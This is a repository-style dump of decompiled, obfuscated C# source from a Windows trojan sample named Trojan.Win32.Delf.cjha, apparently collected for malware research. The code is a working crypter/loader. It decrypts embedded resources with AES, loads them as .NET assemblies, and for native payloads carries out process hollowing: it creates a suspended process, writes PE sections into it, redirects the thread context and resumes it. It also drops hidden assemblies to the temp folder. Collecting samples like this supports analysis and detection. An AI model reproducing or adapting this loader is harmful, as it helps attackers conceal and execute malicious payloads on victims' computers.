MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0002/_0002.cs
+180
View File
@@ -0,0 +1,180 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0002;
using System;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
namespace \u0002
{
internal class \u0002
{
[DllImport("kernel32", EntryPoint = "MoveFileEx")]
private static extern bool \u0003([In] string obj0, [In] string obj1, [In] int obj2);
internal static Assembly \u0003([In] object obj0, [In] ResolveEventArgs obj1)
{
\u0002.\u0002.\u0001 obj = new \u0002.\u0002.\u0001(obj1.Name);
string base64String = Convert.ToBase64String(Encoding.UTF8.GetBytes(obj.\u0003(false)));
string[] strArray = \u0001.\u0001.\u0003(43002).Split(',');
string name = string.Empty;
bool flag1 = false;
bool flag2 = false;
bool flag3 = false;
for (int index = 0; index < strArray.Length - 1; index += 2)
{
if (strArray[index] == base64String)
{
name = strArray[index + 1];
if (name[0] == '[')
{
int num = name.IndexOf(']');
string str = name.Substring(1, num - 1);
flag1 = str.IndexOf('z') >= 0;
flag2 = str.IndexOf('g') >= 0;
flag3 = str.IndexOf('t') >= 0;
name = name.Substring(num + 1);
break;
}
break;
}
}
if (name.Length > 0)
{
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(name);
if (manifestResourceStream != null)
{
int length = (int) manifestResourceStream.Length;
byte[] numArray = new byte[length];
manifestResourceStream.Read(numArray, 0, length);
if (flag1)
numArray = \u0002.\u0001.\u0003(numArray);
if (flag2)
{
try
{
string path1 = string.Format(\u0001.\u0001.\u0003(43220), (object) Path.GetTempPath(), (object) name);
Directory.CreateDirectory(path1);
string path2 = path1 + obj.\u0001 + \u0001.\u0001.\u0003(43233);
if (!File.Exists(path2))
{
Assembly assembly = (Assembly) null;
FileStream fileStream = File.OpenWrite(path2);
fileStream.Write(numArray, 0, numArray.Length);
fileStream.Close();
if (\u0003.\u0003(path2) == 0)
assembly = Assembly.Load(obj.\u0003(true));
File.Delete(path2);
Directory.Delete(path1);
if ((object) assembly != null)
return assembly;
}
}
catch
{
}
}
Assembly assembly1 = (Assembly) null;
if (!flag3)
{
try
{
assembly1 = Assembly.Load(numArray);
}
catch (FileLoadException ex)
{
flag3 = true;
}
catch (BadImageFormatException ex)
{
flag3 = true;
}
}
if (flag3)
{
try
{
string path3 = string.Format(\u0001.\u0001.\u0003(43220), (object) Path.GetTempPath(), (object) name);
Directory.CreateDirectory(path3);
string path4 = path3 + obj.\u0001 + \u0001.\u0001.\u0003(43233);
if (!File.Exists(path4))
{
FileStream fileStream = File.OpenWrite(path4);
fileStream.Write(numArray, 0, numArray.Length);
fileStream.Close();
\u0002.\u0002.\u0003(path4, (string) null, 4);
\u0002.\u0002.\u0003(path3, (string) null, 4);
}
assembly1 = Assembly.LoadFile(path4);
}
catch
{
}
}
return assembly1;
}
}
return (Assembly) null;
}
internal struct \u0001
{
public string \u0001;
public Version \u0001;
public string \u0002;
public string \u0003;
public string \u0003([In] bool obj0)
{
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.Append(this.\u0001);
if (obj0)
{
stringBuilder.Append(\u0001.\u0001.\u0003(43242));
stringBuilder.Append((object) this.\u0001);
}
stringBuilder.Append(\u0001.\u0001.\u0003(43259));
stringBuilder.Append(this.\u0002.Length == 0 ? \u0001.\u0001.\u0003(43276) : this.\u0002);
stringBuilder.Append(\u0001.\u0001.\u0003(43289));
stringBuilder.Append(this.\u0003.Length == 0 ? \u0001.\u0001.\u0003(43314) : this.\u0003);
return stringBuilder.ToString();
}
public \u0001([In] string obj0)
{
this.\u0001 = new Version();
this.\u0002 = string.Empty;
this.\u0003 = string.Empty;
this.\u0001 = string.Empty;
string str1 = obj0;
char[] chArray = new char[1]{ ',' };
foreach (string str2 in str1.Split(chArray))
{
string str3 = str2.Trim();
if (str3.StartsWith(\u0001.\u0001.\u0003(43323)))
this.\u0001 = new Version(str3.Substring(8));
else if (str3.StartsWith(\u0001.\u0001.\u0003(43336)))
{
this.\u0002 = str3.Substring(8);
if (this.\u0002 == \u0001.\u0001.\u0003(43276))
this.\u0002 = string.Empty;
}
else if (str3.StartsWith(\u0001.\u0001.\u0003(43349)))
{
this.\u0003 = str3.Substring(15);
if (this.\u0003 == \u0001.\u0001.\u0003(43314))
this.\u0003 = string.Empty;
}
else
this.\u0001 = str3;
}
}
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0002/_0003.cs
+176
View File
@@ -0,0 +1,176 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0002;
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace \u0002
{
internal class \u0003
{
[DllImport("fusion", EntryPoint = "CreateAssemblyCache", CharSet = CharSet.Auto)]
internal static extern int \u0003([In] ref \u0003.\u0007 obj0, [In] uint obj1);
public static int \u0003([In] string obj0)
{
\u0003.\u0007 obj = (\u0003.\u0007) null;
int num = \u0003.\u0003(ref obj, 0U);
return num != 0 ? num : obj.\u0002(0U, obj0, IntPtr.Zero);
}
public struct \u0001
{
public int \u0001;
public int \u0002;
}
public struct \u0002
{
public \u0003.\u0001 \u0001;
public long \u0001;
public Guid \u0001;
public \u0003.\u0001 \u0002;
public int \u0001;
public int \u0002;
public int \u0003;
public \u0003.\u0001 \u0003;
public string \u0001;
public int \u0004;
public int \u0005;
}
[Guid("0000000c-0000-0000-C000-000000000046")]
[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
[ComImport]
public interface \u0003
{
void \u0001(IntPtr pv, uint cb, out uint pcbRead);
void \u0002(IntPtr pv, uint cb, out uint pcbWritten);
void \u0001(long dlibMove, uint dwOrigin, out ulong plibNewPosition);
void \u0001(ulong libNewSize);
void \u0001(\u0003.\u0003 pstm, ulong cb, out ulong pcbRead, out ulong pcbWritten);
void \u0001(uint grfCommitFlags);
void \u0001();
void \u0001(ulong libOffset, ulong cb, uint dwLockType);
void \u0002(ulong libOffset, ulong cb, uint dwLockType);
void \u0001(out \u0003.\u0002 pstatstg, uint grfStatFlag);
void \u0001(out \u0003.\u0003 ppstm);
}
[Guid("7c23ff90-33af-11d3-95da-00a024a85b51")]
[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
[ComImport]
internal interface \u0004
{
void \u0001(\u0003.\u0005 pName);
void \u0001(out \u0003.\u0005 ppName);
void \u0001([MarshalAs(UnmanagedType.LPWStr)] string szName, int pvValue, uint cbValue, uint dwFlags);
void \u0001([MarshalAs(UnmanagedType.LPWStr)] string szName, out int pvValue, ref uint pcbValue, uint dwFlags);
void \u0001(out int wzDynamicDir, ref uint pdwSize);
}
[Guid("CD193BC0-B4BC-11d2-9833-00C04FC31D2E")]
[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
[ComImport]
internal interface \u0005
{
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(uint PropertyId, IntPtr pvProperty, uint cbProperty);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(uint PropertyId, IntPtr pvProperty, ref uint pcbProperty);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001();
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(IntPtr szDisplayName, ref uint pccDisplayName, uint dwDisplayFlags);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(
object refIID,
object pAsmBindSink,
\u0003.\u0004 pApplicationContext,
[MarshalAs(UnmanagedType.LPWStr)] string szCodeBase,
long llFlags,
int pvReserved,
uint cbReserved,
out int ppv);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(out uint lpcwBuffer, out int pwzName);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(out uint pdwVersionHi, out uint pdwVersionLow);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(\u0003.\u0005 pName, uint dwCmpFlags);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(out \u0003.\u0005 pName);
}
[Guid("9e3aaeb4-d1cd-11d2-bab9-00c04f8eceae")]
[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
[ComImport]
internal interface \u0006
{
void \u0001(
[MarshalAs(UnmanagedType.LPWStr)] string pszName,
uint dwFormat,
uint dwFlags,
uint dwMaxSize,
out \u0003.\u0003 ppStream);
void \u0002(\u0003.\u0005 pName);
void \u0001(uint dwFlags);
void \u0002(uint dwFlags);
}
[InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
[Guid("e707dcde-d1cd-11d2-bab9-00c04f8eceae")]
[ComImport]
internal interface \u0007
{
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(uint dwFlags, [MarshalAs(UnmanagedType.LPWStr)] string pszAssemblyName, IntPtr pvReserved, out uint pulDisposition);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(uint dwFlags, [MarshalAs(UnmanagedType.LPWStr)] string pszAssemblyName, IntPtr pAsmInfo);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(
uint dwFlags,
IntPtr pvReserved,
out \u0003.\u0006 ppAsmItem,
[MarshalAs(UnmanagedType.LPWStr)] string pszAssemblyName);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0001(out object ppAsmScavenger);
[MethodImpl(MethodImplOptions.PreserveSig)]
int \u0002(uint dwFlags, [MarshalAs(UnmanagedType.LPWStr)] string pszManifestFilePath, IntPtr pvReserved);
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0003/_0001.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using System;
namespace \u0003
{
internal class \u0001
{
public static void \u0003() => AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(\u0002.\u0002.\u0003);
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0003/_0002.cs
+48
View File
@@ -0,0 +1,48 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0003;
using System.Runtime.InteropServices;
namespace \u0003
{
internal class \u0002
{
internal static \u0002.\u0001 \u0001;
internal static \u0002.\u0001 \u0002;
internal static \u0002.\u0002 \u0001;
internal static \u0002.\u0002 \u0002;
internal static \u0002.\u0003 \u0001;
internal static \u0002.\u0004 \u0001;
internal static \u0002.\u0004 \u0002;
internal static \u0002.\u0005 \u0001;
[StructLayout(LayoutKind.Explicit, Size = 116, Pack = 1)]
private struct \u0001
{
}
[StructLayout(LayoutKind.Explicit, Size = 120, Pack = 1)]
private struct \u0002
{
}
[StructLayout(LayoutKind.Explicit, Size = 16, Pack = 1)]
private struct \u0003
{
}
[StructLayout(LayoutKind.Explicit, Size = 12, Pack = 1)]
private struct \u0004
{
}
[StructLayout(LayoutKind.Explicit, Size = 76, Pack = 1)]
private struct \u0005
{
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0003/_0003.cs
+88
View File
@@ -0,0 +1,88 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0004;
using \u0005;
using System;
using System.Runtime.InteropServices;
using System.Text;
namespace \u0003
{
internal class \u0003
{
private static \u0003.\u0003.\u0005 \u0001;
private static \u0003.\u0003.\u0002 \u0001;
private static \u0003.\u0003.\u0001 \u0001;
private static \u0003.\u0003.\u0003 \u0001;
private static \u0003.\u0003.\u0004 \u0001;
public static void \u0003([In] string[] obj0)
{
byte[] numArray1 = new byte[0];
string str1 = string.Join(Convert.ToChar(32).ToString(), obj0);
\u0003.\u0003.\u0001 = (\u0003.\u0003.\u0005) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0004()), typeof (\u0003.\u0003.\u0005));
\u0003.\u0003.\u0001 = (\u0003.\u0003.\u0002) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0005()), typeof (\u0003.\u0003.\u0002));
\u0003.\u0003.\u0001 = (\u0003.\u0003.\u0001) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0006()), typeof (\u0003.\u0003.\u0001));
\u0003.\u0003.\u0001 = (\u0003.\u0003.\u0003) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0007()), typeof (\u0003.\u0003.\u0003));
\u0003.\u0003.\u0001 = (\u0003.\u0003.\u0004) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0008()), typeof (\u0003.\u0003.\u0004));
try
{
string str2 = \u0003.\u0003.\u0003(104);
string str3 = \u0003.\u0003.\u0003(105);
if (str2.Length <= 0 || str3.Length <= 0)
return;
byte[] numArray2 = \u0001.\u0003(str3, str2);
if (numArray2.Length <= 0)
return;
if (\u0001.\u0003(numArray2))
\u0001.\u0003(obj0);
else
\u0004.\u0003.\u0003(numArray2, str1, \u0003.\u0003.\u0003());
}
catch
{
}
}
private static string \u0003()
{
StringBuilder stringBuilder = new StringBuilder((int) byte.MaxValue);
int num = (int) \u0003.\u0003.\u0001(IntPtr.Zero, stringBuilder, stringBuilder.Capacity);
return stringBuilder.ToString();
}
private static string \u0003([In] int obj0)
{
byte[] numArray1 = new byte[0];
byte[] numArray2;
try
{
IntPtr num1 = \u0003.\u0003.\u0001(IntPtr.Zero, (IntPtr) obj0, (IntPtr) 2);
IntPtr num2 = \u0003.\u0003.\u0001(IntPtr.Zero, num1);
IntPtr source = \u0003.\u0003.\u0001(num2);
uint length = \u0003.\u0003.\u0001(IntPtr.Zero, num1);
numArray2 = new byte[(IntPtr) length];
Marshal.Copy(source, numArray2, 0, (int) length);
}
catch
{
return string.Empty;
}
return Encoding.Default.GetString(numArray2);
}
private delegate IntPtr \u0001([In] IntPtr obj0);
private delegate IntPtr \u0002([In] IntPtr obj0, [In] IntPtr obj1);
private delegate uint \u0003([In] IntPtr obj0, [In] IntPtr obj1);
private delegate uint \u0004([In] IntPtr obj0, [In] StringBuilder obj1, [MarshalAs(UnmanagedType.U4), In] int _param3);
private delegate IntPtr \u0005([In] IntPtr obj0, [In] IntPtr obj1, [In] IntPtr obj2);
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0004/_0001.cs
+43
View File
@@ -0,0 +1,43 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0004;
using System.Reflection;
using System.Runtime.InteropServices;
namespace \u0004
{
internal class \u0001
{
private static Assembly \u0001;
public static void \u0003([In] string[] obj0)
{
try
{
\u0001.\u0001.EntryPoint.Invoke((object) null, (object[]) obj0);
}
catch
{
}
}
public static bool \u0003([In] byte[] obj0)
{
try
{
\u0001.\u0001 = Assembly.Load(obj0);
if ((object) \u0001.\u0001.EntryPoint == null)
return false;
}
catch
{
return false;
}
return true;
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0004/_0002.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using System;
using System.Runtime.InteropServices;
namespace \u0004
{
internal static class \u0002
{
[STAThread]
private static void \u0003([In] string[] obj0) => \u0003.\u0003.\u0003(obj0);
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0004/_0003.cs
+309
View File
@@ -0,0 +1,309 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0004;
using \u0005;
using System;
using System.Runtime.InteropServices;
namespace \u0004
{
internal class \u0003
{
public static void \u0003([In] byte[] obj0, [In] string obj1, [In] string obj2)
{
\u0003.\u0011 obj3 = new \u0003.\u0011();
\u0003.\u0014 obj4 = new \u0003.\u0014();
\u0003.\u0002 structure1 = new \u0003.\u0002();
\u0003.\u000F structure2 = new \u0003.\u000F();
\u0003.\u0004 obj5 = new \u0003.\u0004();
\u0003.\u0003 obj6 = new \u0003.\u0003();
structure2.\u0001 = (uint) Marshal.SizeOf((object) structure2);
obj6.\u0001 = 65543U;
GCHandle gcHandle = GCHandle.Alloc((object) obj0, GCHandleType.Pinned);
int int32 = gcHandle.AddrOfPinnedObject().ToInt32();
gcHandle.Free();
\u0003.\u0011 structure3 = (\u0003.\u0011) Marshal.PtrToStructure((IntPtr) int32, typeof (\u0003.\u0011));
\u0003.\u0014 structure4 = (\u0003.\u0014) Marshal.PtrToStructure((IntPtr) (int32 + structure3.\u0001), typeof (\u0003.\u0014));
if (structure4.\u0001 != 17744U || structure3.\u0001 != (ushort) 23117)
return;
\u0003.\u0018 forFunctionPointer1 = (\u0003.\u0018) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u000E()), typeof (\u0003.\u0018));
\u0003.\u0013 forFunctionPointer2 = (\u0003.\u0013) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u000F()), \u0002.\u0010()), typeof (\u0003.\u0013));
\u0003.\u0012 forFunctionPointer3 = (\u0003.\u0012) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0011()), typeof (\u0003.\u0012));
\u0003.\u0007 forFunctionPointer4 = (\u0003.\u0007) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0012()), typeof (\u0003.\u0007));
\u0003.\u0010 forFunctionPointer5 = (\u0003.\u0010) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0013()), typeof (\u0003.\u0010));
\u0003.\u0008 forFunctionPointer6 = (\u0003.\u0008) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0014()), typeof (\u0003.\u0008));
\u0003.\u0016 forFunctionPointer7 = (\u0003.\u0016) Marshal.GetDelegateForFunctionPointer(\u0001.\u0003(\u0001.\u0003(\u0002.\u0003()), \u0002.\u0015()), typeof (\u0003.\u0016));
int num1 = forFunctionPointer1(obj2, obj1, IntPtr.Zero, IntPtr.Zero, false, \u0003.\u000E.\u000F, IntPtr.Zero, (string) null, ref structure2, ref obj5) ? 1 : 0;
int num2 = forFunctionPointer2(obj5.\u0001, (IntPtr) (long) structure4.\u0001.\u0007) ? 1 : 0;
int num3 = forFunctionPointer3(obj5.\u0001, (IntPtr) (long) structure4.\u0001.\u0007, structure4.\u0001.\u0010, \u0003.\u0006.\u0001 | \u0003.\u0006.\u0002, \u0003.\u0005.\u0003) ? 1 : 0;
int num4 = forFunctionPointer4(obj5.\u0001, (IntPtr) (long) structure4.\u0001.\u0007, obj0, structure4.\u0001.\u0011, (object) null) ? 1 : 0;
for (int index1 = 0; index1 < (int) structure4.\u0001.\u0002; ++index1)
{
structure1 = (\u0003.\u0002) Marshal.PtrToStructure((IntPtr) (int32 + structure3.\u0001 + Marshal.SizeOf((object) structure4) + Marshal.SizeOf((object) structure1) * index1), typeof (\u0003.\u0002));
byte[] numArray = new byte[(IntPtr) structure1.\u0003];
for (int index2 = 0; index2 < (int) structure1.\u0003; ++index2)
numArray[index2] = obj0[(long) structure1.\u0004 + (long) index2];
int num5 = forFunctionPointer4(obj5.\u0001, (IntPtr) (long) (structure4.\u0001.\u0007 + structure1.\u0002), numArray, structure1.\u0003, (object) null) ? 1 : 0;
}
int num6 = forFunctionPointer5(obj5.\u0002, ref obj6) ? 1 : 0;
byte[] bytes = BitConverter.GetBytes(structure4.\u0001.\u0007);
int num7 = forFunctionPointer4(obj5.\u0001, (IntPtr) (long) (obj6.\u0013 + 8U), bytes, (uint) bytes.Length, (object) null) ? 1 : 0;
obj6.\u0016 = structure4.\u0001.\u0007 + structure4.\u0001.\u0004;
int num8 = forFunctionPointer6(obj5.\u0002, ref obj6) ? 1 : 0;
int num9 = (int) forFunctionPointer7(obj5.\u0002);
}
private struct \u0001
{
public ushort \u0001;
public ushort \u0002;
public uint \u0001;
public uint \u0002;
public uint \u0003;
public ushort \u0003;
public ushort \u0004;
}
private struct \u0002
{
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public byte[] \u0001;
public uint \u0001;
public uint \u0002;
public uint \u0003;
public uint \u0004;
public uint \u0005;
public uint \u0006;
public ushort \u0001;
public ushort \u0002;
public uint \u0007;
}
private struct \u0003
{
public uint \u0001;
public uint \u0002;
public uint \u0003;
public uint \u0004;
public uint \u0005;
public uint \u0006;
public uint \u0007;
public \u0003.\u0017 \u0001;
public uint \u0008;
public uint \u000E;
public uint \u000F;
public uint \u0010;
public uint \u0011;
public uint \u0012;
public uint \u0013;
public uint \u0014;
public uint \u0015;
public uint \u0016;
public uint \u0017;
public uint \u0018;
public uint \u0019;
public uint \u001A;
public uint \u001B;
public uint \u001C;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
public byte[] \u0001;
}
private struct \u0004
{
public IntPtr \u0001;
public IntPtr \u0002;
public uint \u0001;
public uint \u0002;
}
private enum \u0005 : uint
{
\u0005 = 1,
\u0006 = 2,
\u0007 = 4,
\u0008 = 8,
\u0001 = 16, // 0x00000010
\u0002 = 32, // 0x00000020
\u0003 = 64, // 0x00000040
\u0004 = 128, // 0x00000080
\u000E = 256, // 0x00000100
\u000F = 512, // 0x00000200
\u0010 = 1024, // 0x00000400
}
private enum \u0006 : uint
{
\u0001 = 4096, // 0x00001000
\u0002 = 8192, // 0x00002000
\u0003 = 524288, // 0x00080000
\u0006 = 1048576, // 0x00100000
\u0007 = 2097152, // 0x00200000
\u0005 = 4194304, // 0x00400000
\u0004 = 536870912, // 0x20000000
}
private delegate bool \u0007([In] IntPtr obj0, [In] IntPtr obj1, [In] byte[] obj2, [In] uint obj3, [In] object obj4);
private delegate bool \u0008([In] IntPtr obj0, [In] ref \u0003.\u0003 obj1);
private enum \u000E : uint
{
\u0012 = 1,
\u0011 = 2,
\u000F = 4,
\u0013 = 8,
\u0003 = 16, // 0x00000010
\u0004 = 512, // 0x00000200
\u0010 = 1024, // 0x00000400
\u0008 = 2048, // 0x00000800
\u000E = 4096, // 0x00001000
\u0015 = 65536, // 0x00010000
\u0006 = 262144, // 0x00040000
\u0014 = 524288, // 0x00080000
\u0001 = 16777216, // 0x01000000
\u0007 = 33554432, // 0x02000000
\u0002 = 67108864, // 0x04000000
\u0005 = 134217728, // 0x08000000
}
private struct \u000F
{
public uint \u0001;
public string \u0001;
public string \u0002;
public string \u0003;
public uint \u0002;
public uint \u0003;
public uint \u0004;
public uint \u0005;
public uint \u0006;
public uint \u0007;
public uint \u0008;
public uint \u000E;
public short \u0001;
public short \u0002;
public IntPtr \u0001;
public IntPtr \u0002;
public IntPtr \u0003;
public IntPtr \u0004;
}
private delegate bool \u0010([In] IntPtr obj0, [In] ref \u0003.\u0003 obj1);
private struct \u0011
{
public ushort \u0001;
public ushort \u0002;
public ushort \u0003;
public ushort \u0004;
public ushort \u0005;
public ushort \u0006;
public ushort \u0007;
public ushort \u0008;
public ushort \u000E;
public ushort \u000F;
public ushort \u0010;
public ushort \u0011;
public ushort \u0012;
public ushort \u0013;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
public ushort[] \u0001;
public ushort \u0014;
public ushort \u0015;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
public ushort[] \u0002;
public int \u0001;
}
private delegate bool \u0012(
[In] IntPtr obj0,
[In] IntPtr obj1,
[In] uint obj2,
[In] \u0003.\u0006 obj3,
[In] \u0003.\u0005 obj4);
private delegate bool \u0013([In] IntPtr obj0, [In] IntPtr obj1);
private struct \u0014
{
public uint \u0001;
public \u0003.\u0001 \u0001;
public \u0003.\u0019 \u0001;
}
private struct \u0015
{
public uint \u0001;
public uint \u0002;
}
private delegate uint \u0016([In] IntPtr obj0);
private struct \u0017
{
public uint \u0001;
public uint \u0002;
public uint \u0003;
public uint \u0004;
public uint \u0005;
public uint \u0006;
public uint \u0007;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
public byte[] \u0001;
public uint \u0008;
}
private delegate bool \u0018(
[In] string obj0,
[In] string obj1,
[In] IntPtr obj2,
[In] IntPtr obj3,
[In] bool obj4,
[In] \u0003.\u000E obj5,
[In] IntPtr obj6,
[In] string obj7,
[In] ref \u0003.\u000F obj8,
[In] ref \u0003.\u0004 obj9);
private struct \u0019
{
public ushort \u0001;
public byte \u0001;
public byte \u0002;
public uint \u0001;
public uint \u0002;
public uint \u0003;
public uint \u0004;
public uint \u0005;
public uint \u0006;
public uint \u0007;
public uint \u0008;
public uint \u000E;
public ushort \u0002;
public ushort \u0003;
public ushort \u0004;
public ushort \u0005;
public ushort \u0006;
public ushort \u0007;
public uint \u000F;
public uint \u0010;
public uint \u0011;
public uint \u0012;
public ushort \u0008;
public ushort \u000E;
public uint \u0013;
public uint \u0014;
public uint \u0015;
public uint \u0016;
public uint \u0017;
public uint \u0018;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public \u0003.\u0015[] \u0001;
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0005/_0001.cs
+52
View File
@@ -0,0 +1,52 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0005;
using System;
using System.IO;
using System.IO.Compression;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Text;
namespace \u0005
{
internal class \u0001
{
private static byte[] \u0003([In] byte[] obj0, [In] string obj1)
{
Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(obj1, new byte[8]);
return new RijndaelManaged().CreateDecryptor(rfc2898DeriveBytes.GetBytes(32), rfc2898DeriveBytes.GetBytes(16)).TransformFinalBlock(obj0, 0, obj0.Length);
}
